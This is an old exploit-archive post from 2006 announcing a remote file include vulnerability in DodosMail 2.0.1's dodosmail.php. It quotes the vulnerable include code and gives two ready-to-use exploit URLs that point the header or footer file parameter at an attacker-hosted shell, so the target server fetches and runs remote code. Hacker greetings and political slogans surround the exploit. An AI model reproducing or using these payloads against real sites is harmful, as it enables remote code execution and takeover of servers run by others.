DodosMail <= 2.0.1 (dodosmail.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DodosMail <= 2.0.1 (dodosmail.php) Remote File Include Vulnerability
# Published : 2006-11-08
# Author : Cold Zero
# Previous Title : vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities
# Next Title : IrayoBlog 0.2.4 (inc/irayofuncs.php) Remote File Include Vulnerability

--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


DodosMail <= 2.0.1(dodosmail.php)  Remote File Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


######################################################
#
#            DodosMail 2.0.1
#
# Class:     Remote File Include Vulnerability
# Published  2006-11-07
# Remote:    Yes
# Type:      dangerous
# Site:      http://regretless.com/scripts/scripts.php#dodosrangen
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################

file ;

dodosmail.php

==========================

       include_dodosmail_header($dodosmail_header_file);
       echo "<p class="DodosMailError">DodosMail Error - the owner the php server is experiencing techinical difficulties. Please email use ".dodosmail_error_handle($your_email_address)." to send your email.n";
       echo "<br /><br /><a href="javascript:history.back(1)">Back</a>n";
       echo "</p>n";
include_dodosmail_footer($dodosmail_footer_file);


======================================================

Exploit :

Http://www.Victem.0/[DodosMail_PaTH]/dodosmail.php?dodosmail_header_file=http://coldzero.shell
Http://www.Victem.0/[DodosMail_PaTH]/dodosmail.php?dodosmail_footer_file=http://coldzero.shell

======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
              [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR]



#www.4azhar Team                >>      www.4azhar.com
#SpeciaL PoweR SecuritY TeaM    >>      www.specialpower.org



http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------

# www.Syue.com [2006-11-08]